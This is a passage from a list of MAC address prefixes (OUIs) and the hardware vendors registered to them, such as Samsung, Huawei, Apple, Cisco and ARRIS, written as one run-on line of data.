Samsung Electronics.,LTD 1C3947 COMPAL INFORMATION (KUNSHAN) CO., LTD. 342792 FREEBOX SAS 40A108 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 705AB6 COMPAL INFORMATION (KUNSHAN) CO., LTD. 201A06 COMPAL INFORMATION (KUNSHAN) CO., LTD. F8A963 COMPAL INFORMATION (KUNSHAN) CO., LTD. DC0EA1 COMPAL INFORMATION (KUNSHAN) CO., LTD. B870F4 COMPAL INFORMATION (KUNSHAN) CO., LTD. 009D6B Murata Manufacturing Co., Ltd. 745933 Danal Entertainment EC58EA Ruckus Wireless 7C9A54 Technicolor CH USA Inc. 388B59 Google, Inc. 880118 BLT Co A42618 Integrated Device Technology (Malaysia) Sdn. Bhd. A46191 NamJunSa 84A24D Birds Eye Systems Private Limited 7C6B9C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0017B6 Aquantia Corporation 105917 Tonal D0EFC1 HUAWEI TECHNOLOGIES CO.,LTD D45251 IBT Ingenieurbureau Broennimann Thun 0018B5 Magna Carta D87EB1 x.o.ware, inc. 485702 HUAWEI TECHNOLOGIES CO.,LTD 644F42 JETTER CO., Ltd. DCAF68 WEIFANG GOERTEK ELECTRONICS CO.,LTD 24EC51 ADF Technologies Sdn Bhd 7089CC China Mobile Group Device Co.,Ltd. 2C5BE1 Centripetal Networks, Inc DCEFCA Murata Manufacturing Co., Ltd. 00BC60 Cisco Systems, Inc CC7B61 NIKKISO CO., LTD. 9C713A HUAWEI TECHNOLOGIES CO.,LTD 2C97B1 HUAWEI TECHNOLOGIES CO.,LTD A89969 Dell Inc. A4EA8E Extreme Networks, Inc. 882D53 Baidu Online Network Technology (Beijing) Co., Ltd. 00D0B5 IPricot formerly DotCom 746BAB GUANGDONG ENOK COMMUNICATION CO., LTD 0CB6D2 D-Link International 7829ED ASKEY COMPUTER CORP 5061BF Cisco Systems, Inc 0009DF Vestel Elektronik San ve Tic. A.Åž. F4032F Reduxio Systems 944A0C Sercomm Corporation. 000FA2 2xWireless 108EE0 Samsung Electronics Co.,Ltd FCA621 Samsung Electronics Co.,Ltd 8CF228 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 700F6A Cisco Systems, Inc 000BB2 SMALLBIG TECHNOLOGY 00305E Abelko Innovation FC6BF0 TOPWELL INTERNATIONAL HOLDINDS LIMITED 001477 Trilliant 00079B Aurora Networks 544810 Dell Inc. 54B203 PEGATRON CORPORATION 3868DD INVENTEC CORPORATION B8B7F1 Wistron Neweb Corporation 8050F6 ITEL MOBILE LIMITED A8CAB9 SAMSUNG ELECTRO MECHANICS CO., LTD. 203956 HMD Global Oy 78AFE4 Comau S.p.A 90A137 Beijing Splendidtel Communication Technology Co,. Ltd 80029C Gemtek Technology Co., Ltd. D0C5D3 AzureWave Technology Inc. 14169EWingtech Group (HongKong)Limited F8C39E HUAWEI TECHNOLOGIES CO.,LTD E8D099 Fiberhome Telecommunication Technologies Co.,LTD 107BA4 Olive & Dove Co.,Ltd. 7C41A2 Nokia BC325F Zhejiang Dahua Technology Co., Ltd. 505BC2 Liteon Technology Corporation 6C21A2 AMPAK Technology, Inc. 9C2F73 Universal Tiancheng Technology (Beijing) Co., Ltd. D832E3 Xiaomi Communications Co Ltd 9487E0 Xiaomi Communications Co Ltd 38AF29 Zhejiang Dahua Technology Co., Ltd. C88629 Shenzhen Duubee Intelligent Technologies Co.,LTD. CCC2E0 Raisecom Technology CO., LTD 300AC5 Ruio telecommunication technologies Co., Limited 00E065 OPTICAL ACCESS INTERNATIONAL 4466FC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A028ED HMD Global Oy AC5474 China Mobile IOT Company Limited 8C1CDA IEEE Registration Authority 0007A8 Haier Group Technologies Ltd 9814D2 Avonic 1409DC HUAWEI TECHNOLOGIES CO.,LTD EC9365 Mapper.ai, Inc. C4BAA3 Beijing Winicssec Technologies Co., Ltd. 9CFEA1 Fiberhome Telecommunication Technologies Co.,LTD D88A3B UNIT-EM EC5A86 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd C0EEB5 Enice Network. 60DEF3 HUAWEI TECHNOLOGIES CO.,LTD 50A009 Xiaomi Communications Co Ltd 88964E ARRIS Group, Inc. 883F4A Texas Instruments 9CA615 TP-LINK TECHNOLOGIES CO.,LTD. E44E76 CHAMPIONTECHENTERPRISE (SHENZHEN) INC 004098 DRESSLER GMBH & CO. 001DFA Fujian LANDI Commercial Equipment Co.,Ltd 9CE65E Apple, Inc. C49880 Apple, Inc. E0338E Apple, Inc. 08F69C Apple, Inc. 04FA83 Qingdao Haier Technology Co.,Ltd 78F9B4 Nokia D076E7 TP-LINK TECHNOLOGIES CO.,LTD. 50A67F Apple, Inc. D461DA Apple, Inc. F01898 Apple, Inc. 881908 Apple, Inc. 5C0947 Apple, Inc. 14205E Apple, Inc. B841A4 Apple, Inc. 00165C Trackflow Ltd. 641CAE Samsung Electronics Co.,Ltd F8E44E MCOT INC. 40CD7A Qingdao Hisense Communications Co.,Ltd. DC4EF4 Shenzhen MTN Electronics CO., Ltd F08173 Amazon Technologies Inc. EC65CC Panasonic Automotive Systems Company of America 949990 VTC Telecommunications F4BC97 Shenzhen Crave Communication Co., LTD 28FEDE COMESTA, Inc. 907910 Integrated Device Technology (Malaysia) Sdn. Bhd. 003DE8 LG Electronics (Mobile Communications) 68FEDA Fiberhome Telecommunication Technologies Co.,LTD E8986D Palo Alto Networks 144E34 Remote Solution 00508B Hewlett Packard 146B9C SHENZHEN BILIAN ELECTRONIC CO.,LTD 948DEF Oetiker Schweiz AG 2CD974 Hui Zhou Gaoshengda Technology Co.,LTD D4F786 Fiberhome Telecommunication Technologies Co.,LTD 3403DE Texas Instruments 240A63 ARRIS Group, Inc. F88B37 ARRIS Group, Inc. 20677C Hewlett Packard Enterprise 34D712 Smartisan Digital Co., Ltd A06610 FUJITSU LIMITED 44FFBA zte corporation E0E62E TCT mobile ltd 387862 Sony Mobile Communications Inc E42D7B China Mobile IOT Company Limited C464E3 Texas Instruments 8817A3 Integrated Device Technology (Malaysia) Sdn. Bhd. 88A9A7 IEEE Registration Authority EC8914 HUAWEI TECHNOLOGIES CO.,LTD B89436 HUAWEI TECHNOLOGIES CO.,LTD 501479 iRobot Corporation 6084BD BUFFALO.INC 347ECA NEXTWILL B42EF8 Eline Technology co.Ltd A4D4B2 Shenzhen MeiG Smart Technology Co.,Ltd 8CF773 Nokia DCDD24 Energica Motor Company SpA 641CB0 Samsung Electronics Co.,Ltd 903A72 Ruckus Wireless CC3B58 Curiouser Products Inc 4CEFC0 Amazon Technologies Inc. 8C5973 Zyxel Communications Corporation 24181D SAMSUNG ELECTRO-MECHANICS(THAILAND) 58D759 HUAWEI TECHNOLOGIES CO.,LTD F89066 Nain Inc. 7006AC Eastcompeace Technology Co., Ltd 2802D8 Samsung Electronics Co.,Ltd DCE533 IEEE Registration Authority D8445C DEV Tecnologia Ind Com Man Eq LTDA 509551 ARRIS Group, Inc. 804126 HUAWEI TECHNOLOGIES CO.,LTD ACF970 HUAWEI TECHNOLOGIES CO.,LTD 7C3953 zte corporation 38E1AA zte corporation 48C796 Samsung Electronics Co.,Ltd F4C248 Samsung Electronics Co.,Ltd F47190 Samsung Electronics Co.,Ltd C4FFBC IEEE Registration Authority 0C2369 Honeywell SPS 04C9D9 Dish Technologies Corp 7055F8 Cerebras Systems Inc 6C54CD LAMPEX ELECTRONICS LIMITED 000889 Dish Technologies Corp F0B5B7 Disruptive Technologies Research AS B4DEDF zte corporation 283B82 D-Link International D4909C Apple, Inc. E4E0A6 Apple, Inc. 580454 ICOMM HK LIMITED 3C9A77 Technicolor CH USA Inc. C477AF Advanced Digital Broadcast SA 94290C Shenyang wisdom Foundation Technology Development Co., Ltd. 9C32CE CANON INC. 20E09C Nokia 2CFDA1 ASUSTek COMPUTER INC. 3807D4 Zeppelin Systems GmbH 04197F Grasphere Japan 5C0038 Viasat Group S.p.A. 8CEC4B Dell Inc. 005091 NETACCESS, INC. B85001 Extreme Networks, Inc. 802BF9 Hon Hai Precision Ind. Co.,Ltd. 54B802 Samsung Electronics Co.,Ltd 10CEA9 Texas Instruments 805E0C YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 6C49C1 o2ones Co., Ltd. 70EEA3 Eoptolink Technology Inc. Ltd, 7047E9 vivo Mobile Communication Co., Ltd. 5C521E Nintendo Co.,Ltd 14444A Apollo Seiko Ltd. 3C2C99 Edgecore Networks Corporation 88D039 TCL Technoly Electronics(Huizhou).,Ltd 683E02 SIEMENS AG, Digital Factory, Motion Control System 000261 Tilgin AB 0014C3 Seagate Technology 0004CF Seagate Technology 002037 Seagate Technology 5C81A7 Network Devices Pty Ltd 5C0C0E Guizhou Huaxintong Semiconductor Technology Co Ltd 503CEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D096FB DASAN Network Solutions 00E091 LG Electronics 38437D Compal Broadband Networks, Inc. 506F98 Sehaj Synergy Technologies Private Limited 4CAE1C SaiNXT Technologies LLP 142882 MIDICOM ELECTRONICS CO.LTD EC8193 Logitech, Inc 6CDD30 Cisco Systems, Inc 6C4E86 Third Millennium Systems Ltd. 5C86C1 DONGGUAN SOLUM ELECTRONICS CO.,LTD 5C7776 TCT mobile ltd 70E56E Texas Instruments 547DCD Texas Instruments 00AECD Pensando Systems FC9DD8 Beijing TongTongYiLian Science and Technology Ltd. DC2834 HAKKO Corporation 84509A Easy Soft TV Co., Ltd 001730 Automation Electronics 30E48E Vodafone UK 449160 Murata Manufacturing Co., Ltd. B4F1DA LG Electronics (Mobile Communications) C863F1 Sony Interactive Entertainment Inc. DCE1AD Shenzhen Wintop Photoelectric Technology Co., Ltd 948854 Texas Instruments 001D0D Sony Interactive Entertainment Inc. B0FC36 CyberTAN Technology Inc. 001DF4 Magellan Technology Pty Limited 6C05D5 Ethertronics Inc 0019C2 Equustek Solutions, Inc. ECB0E1 Ciena Corporation 78DDD9 Guangzhou Shiyuan Electronics Co., Ltd. F8B7E2 Cisco Systems, Inc F82055 Green Information System 74E19A Fiberhome Telecommunication Technologies Co.,LTD 000097 Dell EMC 8CCF09 Dell EMC 8C839D SHENZHEN XINYUPENG ELECTRONIC TECHNOLOGY CO., LTD B0C19E zte corporation 0C3747 zte corporation ACA667 Electronic Systems Protection, Inc. 0081F9 Texas Instruments ECB5FA Philips Lighting BV 44CD0E FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. E8825B ARRIS Group, Inc. 70991C Shenzhen Honesty Electronics Co.,Ltd 80B03D Apple, Inc. E49ADC Apple, Inc. ACE4B5 Apple, Inc. D0D2B0 Apple, Inc. 001CAE WiChorus, Inc. 7CDD76 Suzhou Hanming Technologies Co., Ltd. 246880 Braveridge.co.,ltd. F092B4 SICHUAN TIANYI COMHEART TELECOMCO., LTD E8DF70 AVM Audiovisuelles Marketing und Computersysteme GmbH 28AD3E Shenzhen TONG BO WEI Technology CO.,LTD 001C56 Pado Systems, Inc. F06D78 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7844FD TP-LINK TECHNOLOGIES CO.,LTD. ECF8EB SICHUAN TIANYI COMHEART TELECOMCO., LTD 707D95 Shenzhen City LinwlanTechnology Co. Ltd. 2C431A Shenzhen YOUHUA Technology Co., Ltd A8D3C8 Topcon Electronics GmbH & Co. KG D05995 Fiberhome Telecommunication Technologies Co.,LTD 18CC88 Hitachi Johnson Controls Air 80C755 Panasonic Appliances Company F0BD2E H+S Polatis Ltd 746EE4 Asia Vital Components Co.,Ltd. 0040E4 E-M TECHNOLOGY, INC. 984B4A ARRIS Group, Inc. E084F3 High Grade Controls Corporation 38A6CE BSkyB Ltd 3456FE Cisco Meraki 70708B Cisco Systems, Inc 389F5A C-Kur TV Inc. D843ED Suzuken BC4101 Shenzhen TINNO Mobile Technology Corp. 043A0D SM Optics S.r.l. 448F17 Samsung Electronics Co., Ltd. ARTIK 00FC8B Amazon Technologies Inc. 0076B1 Somfy-Protect By Myfox SAS 6CC147 Xiamen Hanin Electronic Technology Co., Ltd A072E4 NJ SYSTEM CO.,LTD 4C1365 Emplus Technologies CCF957 u-blox AG 0C62A6 Hui Zhou Gaoshengda Technology Co.,LTD 18132D zte corporation 74D21D HUAWEI TECHNOLOGIES CO.,LTD 1878D4 Verizon B8D94D Sagemcom Broadband SAS 3890A5 Cisco Systems, Inc C0742B SHENZHEN XUNLONG SOFTWARE CO.,LIMITED 5C6776 IDS Imaging Development Systems GmbH 44EAD8 Texas Instruments 189BA5 IEEE Registration Authority A491B1 Technicolor 1C7022 Murata Manufacturing Co., Ltd. CC9891 Cisco Systems, Inc 28BF89 Fiberhome Telecommunication Technologies Co.,LTD 903DBD SECURE METERS LIMITED 002294 KYOCERA CORPORATION 3889DC Opticon Sensors Europe B.V. 8C4500 Murata Manufacturing Co., Ltd. 1CDDEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 940006 jinyoung 20040F Dell Inc. A43412 Thales Alenia Space 8C8590 Apple, Inc. BC88C3 Ningbo Dooya Mechanic & Electronic Technology Co., Ltd 38CD07 Beijing FaceCam Technology Co., Ltd. 00D060 Panasonic Europe Ltd. ECFA03 FCA 6C96CF Apple, Inc. 681F40 Blu Wireless Technology Ltd 90ADF7 vivo Mobile Communication Co., Ltd. 40CE24 Cisco Systems, Inc 3432E6 Panasonic Industrial Devices Europe GmbH 40017A Cisco Systems, Inc 78886D Apple, Inc. 20EE28 Apple, Inc. B4F61C Apple, Inc. 08F4AB Apple, Inc. FC017C Hon Hai Precision Ind. Co.,Ltd. 90324B Hon Hai Precision Ind. Co.,Ltd. 602E20 HUAWEI TECHNOLOGIES CO.,LTD E472E2 HUAWEI TECHNOLOGIES CO.,LTD 00127D MobileAria F86465 Anova Applied Electronics, Inc. 002060 ALCATEL ITALIA S.p.A. 508F4C Xiaomi Communications Co Ltd A47758 Ningbo Freewings Technologies Co.,Ltd 58A0CB TrackNet, Inc 000CEC Spectracom Corp. E06089 Cloudleaf, Inc. 783690 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd BC54FC SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 0C4B54 TP-LINK TECHNOLOGIES CO.,LTD. E4F004 Dell Inc. 94E36D Texas Instruments F0F8F2 Texas Instruments 341513 Texas Instruments 74819A PT. Hartono Istana Teknologi 283545 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 044F4C HUAWEI TECHNOLOGIES CO.,LTD 18B81F ARRIS Group, Inc. 1C151F HUAWEI TECHNOLOGIES CO.,LTD 008BFC mixi,Inc. A82BB5 Edgecore Networks Corporation E8E1E2 Energotest 7811DC XIAOMI Electronics,CO.,LTD D463C6 Motorola Mobility LLC, a Lenovo Company F844E3 Taicang T&W Electronics 24A534 SynTrust Tech International Ltd. C444A0 Cisco Systems, Inc 18742E Amazon Technologies Inc. 90A365 HMD Global Oy DC44B6 Samsung Electronics Co.,Ltd 1007B6 Samsung Electronics Co.,Ltd 342D0D Samsung Electronics Co.,Ltd A44CC8 Dell Inc. D837BE SHENZHEN GONGJIN ELECTRONICS CO.,LT D4684D Ruckus Wireless 8C0C90 Ruckus Wireless 6CAAB3 Ruckus Wireless 001392 Ruckus Wireless 085114 QINGDAO TOPSCOMM COMMUNICATION CO., LTD D05A00 Technicolor CH USA Inc. 70788B vivo Mobile Communication Co., Ltd. 4859A4 zte corporation 54BD79 Samsung Electronics Co.,Ltd A0423F Tyan Computer Corp 70F11C Shenzhen Ogemray Technology Co.,Ltd 7065A3 Kandao lightforge Co., Ltd. 14144B Ruijie Networks Co.,LTD 74D0DC Ericsson AB C08ADE Ruckus Wireless 001D2E Ruckus Wireless B4E62A LG Innotek A0C5F2 IEEE Registration Authority A86B7C SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. B03956 NETGEAR 3C0CDB UNIONMAN TECHNOLOGY CO.,LTD EC42B4 ADC Corporation 60DA83 Hangzhou H3C Technologies Co., Limited 2C5731Wingtech Group (HongKong)Limited CC4639 WAAV, Inc. AC9E17 ASUSTek COMPUTER INC. 641666 Nest Labs Inc. D8DF7A Quest Software, Inc. 145BE1 nyantec GmbH A0239F Cisco Systems, Inc 70F35A Cisco Systems, Inc A0341B Adero Inc A0AFBD Intel Corporate 7C8BCA TP-LINK TECHNOLOGIES CO.,LTD. B04E26 TP-LINK TECHNOLOGIES CO.,LTD. B089C2 Zyptonite F023B9 IEEE Registration Authority FC4DD4 Universal Global Scientific Industrial Co., Ltd. A4F4C2 VNPT TECHNOLOGY 8C147D IEEE Registration Authority 30074D SAMSUNG ELECTRO-MECHANICS(THAILAND) 1C1FD4 LifeBEAM Technologies LTD 009AD2 Cisco Systems, Inc 447F77 Connected Home E8B6C2 Juniper Networks 947BE7 Samsung Electronics Co.,Ltd 5092B9 Samsung Electronics Co.,Ltd DC74A8 Samsung Electronics Co.,Ltd E83935 Hewlett Packard 00180A Cisco Meraki 5C6A80 Zyxel Communications Corporation D860B3 Guangdong Global Electronic Technology CO.,LTD 64351C e-CON SYSTEMS INDIA PVT LTD 60BA18 nextLAP GmbH 44AA50 Juniper Networks 84CD62 ShenZhen IDWELL Technology CO.,Ltd A8D579 Beijing Chushang Science and Technology Co.,Ltd 4448C1 Hewlett Packard Enterprise 481063 NTT Innovation Institute, Inc. A08E78 Sagemcom Broadband SAS 88D50C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D428D5 TCT mobile ltd 9CAF6F ITEL MOBILE LIMITED FC539E Shanghai Wind Technologies Co.,Ltd 605317 Sandstone Technologies 907065 Texas Instruments 18A958 PROVISION THAI CO., LTD. 74C9A3 Fiberhome Telecommunication Technologies Co.,LTD EC8A4C zte corporation D45F25 Shenzhen YOUHUA Technology Co., Ltd 40C8CB AM Telecom co., Ltd. 2CABEB Cisco Systems, Inc C83A6B Roku, Inc B4C6F8 Axilspot Communication 9CE951 Shenzhen Sang Fei Consumer Communications Ltd., Co. B8D50B Sunitec Enterprise Co.,Ltd BC66DE Shadow Creator Information Technology Co.,Ltd. 1868CB Hangzhou Hikvision Digital Technology Co.,Ltd. C4AE12 Samsung Electronics Co.,Ltd 001FA4 SHENZHEN GONGJIN ELECTRONICS CO.,LT D4DCCD Apple, Inc. 484BAA Apple, Inc. DCA904 Apple, Inc. 6CAB31 Apple, Inc. 4C74BF Apple, Inc. 04946B TECNO MOBILE LIMITED A04C5B Shenzhen TINNO Mobile Technology Corp. 488803 ManTechnology Inc. B436E3 KBVISION GROUP 94D299 Techmation Co.,Ltd. 341A35 Fiberhome Telecommunication Technologies Co.,LTD 2C029F 3ALogics 64D154 Routerboard.com 58D9D5 Tenda Technology Co.,Ltd.Dongguan branch 6C4B90 LiteON 00050F Tanaka S/S Ltd. 989E63 Apple, Inc. 886B6E Apple, Inc. F4E4AD zte corporation 28FF3E zte corporation B8D7AF Murata Manufacturing Co., Ltd. D4AE05 Samsung Electronics Co.,Ltd E048AF Premietech Limited 2C3311 Cisco Systems, Inc 5082D5 Apple, Inc. F0EE10 Samsung Electronics Co.,Ltd C4700B GUANGZHOU CHIP TECHNOLOGIES CO.,LTD 3CA067 Liteon Technology Corporation BC024A HMD Global Oy 949901 Shenzhen YITOA Digital Appliance CO.,LTD F85971 Intel Corporate 1005CA Cisco Systems, Inc 7894B4 Sercomm Corporation. 443708 MRV Comunications 285F2F RNware Co.,Ltd. 500FF5 Tenda Technology Co.,Ltd.Dongguan branch BC452E Knowledge Development for POF S.L. DCC64B HUAWEI TECHNOLOGIES CO.,LTD 043389 HUAWEI TECHNOLOGIES CO.,LTD 00A068 BHP LIMITED 703ACB Google, Inc. 706DEC Wifi-soft LLC B0C205 BIONIME 94F551 Cadi Scientific Pte Ltd 105AF7 ADB Italia B81DAA LG Electronics (Mobile Communications) 00E400 Sichuan Changhong Electric Ltd. 2C55D3 HUAWEI TECHNOLOGIES CO.,LTD 00C024 EDEN SISTEMAS DE COMPUTACAO SA 7C4685 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 1C1EE3 Hui Zhou Gaoshengda Technology Co.,LTD 44032C Intel Corporate 7868F7 YSTen Technology Co.,Ltd 004BF3 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 08CCA7 Cisco Systems, Inc 0896AD Cisco Systems, Inc 0823B2 vivo Mobile Communication Co., Ltd. 88C3B3 SOVICO E05124 NXP Semiconductors 001DA3 SabiOso 542F8A TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 6014B3 CyberTAN Technology Inc. 105611 ARRIS Group, Inc. 347877 O-Net Communications (Shenzhen) Limited 0020CC DIGITAL SERVICES, LTD. 689FF0 zte corporation 5CAF06 LG Electronics (Mobile Communications) 00179B CHANT SINCERE CO.,LTD 1C398A Fiberhome Telecommunication Technologies Co.,LTD E865D4 Tenda Technology Co.,Ltd.Dongguan branch 24D51C Zhongtian broadband technology co., LTD EC43F6 Zyxel Communications Corporation 60C658 PHYTRONIX Co.,Ltd. FCB58A Wapice Ltd. A462DF DS Global. Co., LTD 4C1694 shenzhen sibituo Technology Co., Ltd C81451 HUAWEI TECHNOLOGIES CO.,LTD 44D437 Inteno Broadband Technology AB ECE154 Beijing Unisound Information Technology Co.,Ltd. 6C160E ShotTracker 803A0A Integrated Device Technology (Malaysia) Sdn. Bhd. 0C73BE Dongguan Haimai Electronie Technology Co.,Ltd 286F7F Cisco Systems, Inc F0C850 HUAWEI TECHNOLOGIES CO.,LTD 00014F Adtran Inc 285261 Cisco Systems, Inc C8AA55 Hunan Comtom Electronic Incorporated Co.,Ltd 20780B Delta Faucet Company 8809AF Masimo Corporation 2CD02D Cisco Systems, Inc 9CCC83 Juniper Networks 2C6373 SICHUAN TIANYI COMHEART TELECOMCO., LTD 24A7DC BSkyB Ltd 64DBA0 Select Comfort F8983A Leeman International (HongKong) Limited 4CECEF Soraa, Inc. 1CEFCE bebro electronic GmbH 98B6E9 Nintendo Co.,Ltd F015B9 PlayFusion Limited 64B0A6 Apple, Inc. 7C04D0 Apple, Inc. 84FCAC Apple, Inc. DC0C5C Apple, Inc. 70700D Apple, Inc. 30E171 Hewlett Packard 186590 Apple, Inc. F86214 Apple, Inc. 784F43 Apple, Inc. 404D7F Apple, Inc. 001D72 Wistron Corporation D8197A Nuheara Ltd 4C38D5 MITAC COMPUTING TECHNOLOGY CORPORATION 54B56C Xi'an NovaStar Tech Co., Ltd 344CC8 Echodyne Corp 64136C zte corporation 04B648 ZENNER 98F199 NEC Platforms, Ltd. 1840A4 Shenzhen Trylong Smart Science and Technology Co., Ltd. 1C48CE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C80CC8 HUAWEI TECHNOLOGIES CO.,LTD 0425C5 HUAWEI TECHNOLOGIES CO.,LTD 603E7B Gafachi, Inc. 4C7487 Leader Phone Communication Technology Co., Ltd. AC83F3 AMPAK Technology, Inc. CC8CDA Shenzhen Wei Da Intelligent Technology Go.,Ltd D436DB Jiangsu Toppower Automotive Electronics Co., Ltd 2CDCAD Wistron Neweb Corporation 6C5C14 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E80945 Integrated Device Technology (Malaysia) Sdn. Bhd. B0A2E7 Shenzhen TINNO Mobile Technology Corp. 7C2587 chaowifi.com 2C2131 Juniper Networks 00501E Grass Valley, A Belden Brand EC0D9A Mellanox Technologies, Inc. 90D7BE Wavelab Global Inc. 244E7B IEEE Registration Authority 30AEA4 Espressif Inc. 3CFA43 HUAWEI TECHNOLOGIES CO.,LTD 145F94 HUAWEI TECHNOLOGIES CO.,LTD 001F82 Cal-Comp Electronics & Communications Company Ltd. 883C1C MERCURY CORPORATION 002144 SS Telecoms 006BF1 Cisco Systems, Inc 2834A2 Cisco Systems, Inc 7823AE ARRIS Group, Inc. 20719E SF Technology Co.,Ltd 2CC260 Oracle Corporation 3C3F51 2CRSI 3C2AF4 Brother Industries, LTD. C0854C Ragentek Technology Group 0024AC Hangzhou DPtech Technologies Co., Ltd. 50584F waytotec,Inc. 085DDD MERCURY CORPORATION 8C60E7 MPGIO CO.,LTD CC9470 Kinestral Technologies, Inc. B439D6 ProCurve Networking by HP 34F39A Intel Corporate D816C1 DEWAV (HK) ELECTRONICS LIMITED CC61E5 Motorola Mobility LLC, a Lenovo Company 8C8ABB Beijing Orient View Technology Co., Ltd. 00039B NetChip Technology, Inc. 44D9E7 Ubiquiti Networks Inc. 24A43C Ubiquiti Networks Inc. 9C8BA0 Apple, Inc. CC088D Apple, Inc. 38A4ED Xiaomi Communications Co Ltd B89919 7signal Solutions, Inc 40FE0D MAXIO AC64DD IEEE Registration Authority 94B819 Nokia 787D48 ITEL MOBILE LIMITED 8871E5 Amazon Technologies Inc. BC39D9 Z-TEC 609AC1 Apple, Inc. 748D08 Apple, Inc. 00B0EE Ajile Systems, Inc. 0418D6 Ubiquiti Networks Inc. 20DBAB Samsung Electronics Co., Ltd. 383A21 IEEE Registration Authority D8380D SHENZHEN IP-COM Network Co.,Ltd 88AD43 PEGATRON CORPORATION B4EFFA Lemobile Information Technology (Beijing) Co., Ltd. 6C71BD EZELINK TELECOM 60EFC6 Shenzhen Chima Technologies Co Limited 001FC6 ASUSTek COMPUTER INC. B0C128 Adler ELREHA GmbH 3087D9 Ruckus Wireless FCCAC4 LifeHealth, LLC F0D9B2 EXO S.A. E4C801 BLU Products Inc F09838 HUAWEI TECHNOLOGIES CO.,LTD C80E14 AVM Audiovisuelles Marketing und Computersysteme GmbH AC63BE Amazon Technologies Inc. F81D78 IEEE Registration Authority 38F7B2 SEOJUN ELECTRIC 101250 Integrated Device Technology (Malaysia) Sdn. Bhd. 7802B7 ShenZhen Ultra Easy Technology CO.,LTD 646184 VELUX E8E5D6 Samsung Electronics Co.,Ltd C87E75 Samsung Electronics Co.,Ltd 00265F Samsung Electronics Co.,Ltd 00233A Samsung Electronics Co.,Ltd 086A0A ASKEY COMPUTER CORP 98E7F4 Hewlett Packard 0007AB Samsung Electronics Co.,Ltd 002486 DesignArt Networks 002478 Mag Tech Electronics Co Limited 382DD1 Samsung Electronics Co.,Ltd 001B2C ATRON electronic GmbH 9034FC Hon Hai Precision Ind. Co.,Ltd. 001427 JazzMutant 001E84 Pika Technologies Inc. 10DDB1 Apple, Inc. 002329 DDRdrive LLC 0026AD Arada Systems, Inc. FC1F19 SAMSUNG ELECTRO MECHANICS CO., LTD. 840B2D SAMSUNG ELECTRO MECHANICS CO., LTD. 206432 SAMSUNG ELECTRO MECHANICS CO., LTD. B407F9 SAMSUNG ELECTRO MECHANICS CO., LTD. 889FFA Hon Hai Precision Ind. Co.,Ltd. 8C7CB5 Hon Hai Precision Ind. Co.,Ltd. C44619 Hon Hai Precision Ind. Co.,Ltd. 506313 Hon Hai Precision Ind. Co.,Ltd. 60D819 Hon Hai Precision Ind. Co.,Ltd. F82FA8 Hon Hai Precision Ind. Co.,Ltd. 0C84DC Hon Hai Precision Ind. Co.,Ltd. 00166C Samsung Electronics Co.,Ltd 181EB0 Samsung Electronics Co.,Ltd 247F20 Sagemcom Broadband SAS E8039A Samsung Electronics Co.,Ltd 30CDA7 Samsung Electronics Co.,Ltd 001247 Samsung Electronics Co.,Ltd 001599 Samsung Electronics Co.,Ltd 0012FB Samsung Electronics Co.,Ltd D0667B Samsung Electronics Co.,Ltd B85E7B Samsung Electronics Co.,Ltd E492FB Samsung Electronics Co.,Ltd 6CB7F4 Samsung Electronics Co.,Ltd 2C4401 Samsung Electronics Co.,Ltd B8D9CE Samsung Electronics Co.,Ltd 1C66AA Samsung Electronics Co.,Ltd 3C8BFE Samsung Electronics Co.,Ltd D4E8B2 Samsung Electronics Co.,Ltd 1489FD Samsung Electronics Co.,Ltd BC851F Samsung Electronics Co.,Ltd 0015B9 Samsung Electronics Co.,Ltd 002491 Samsung Electronics Co.,Ltd 002339 Samsung Electronics Co.,Ltd 5001BB Samsung Electronics Co.,Ltd C40142 MaxMedia Technology Limited 8430E5 SkyHawke Technologies, LLC 1C77F6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 58E326 Compass Technologies Inc. 001B2A Cisco Systems, Inc 749DDC 2Wire Inc 14DDE5 MPMKVVCL 001A09 Wayfarer Transit Systems Ltd 742344 Xiaomi Communications Co Ltd 54880E SAMSUNG ELECTRO-MECHANICS(THAILAND) F025B7 SAMSUNG ELECTRO-MECHANICS(THAILAND) F04347 HUAWEI TECHNOLOGIES CO.,LTD 9CB2B2 HUAWEI TECHNOLOGIES CO.,LTD A8C83A HUAWEI TECHNOLOGIES CO.,LTD BC72B1 Samsung Electronics Co.,Ltd 78F7BE Samsung Electronics Co.,Ltd 684898 Samsung Electronics Co.,Ltd 3423BA SAMSUNG ELECTRO-MECHANICS(THAILAND) 003676 ARRIS Group, Inc. FC8E7E ARRIS Group, Inc. FC6FB7 ARRIS Group, Inc. D42C0F ARRIS Group, Inc. 400E85 SAMSUNG ELECTRO-MECHANICS(THAILAND) C8BA94 SAMSUNG ELECTRO-MECHANICS(THAILAND) 843838 SAMSUNG ELECTRO-MECHANICS(THAILAND) A055DE ARRIS Group, Inc. 80F503 ARRIS Group, Inc. 44AAF5 ARRIS Group, Inc. E09DFA Wanan Hongsheng Electronic Co.Ltd 5C3C27 Samsung Electronics Co.,Ltd 70A84C MONAD., Inc. 84C7EA Sony Mobile Communications Inc 24E43F Wenzhou Kunmei Communication Technology Co.,Ltd. 287AEE ARRIS Group, Inc. 88797E Motorola Mobility LLC, a Lenovo Company 305890 Frontier Silicon Ltd 708BCD ASUSTek COMPUTER INC. 00258B Mellanox Technologies, Inc. 00562B 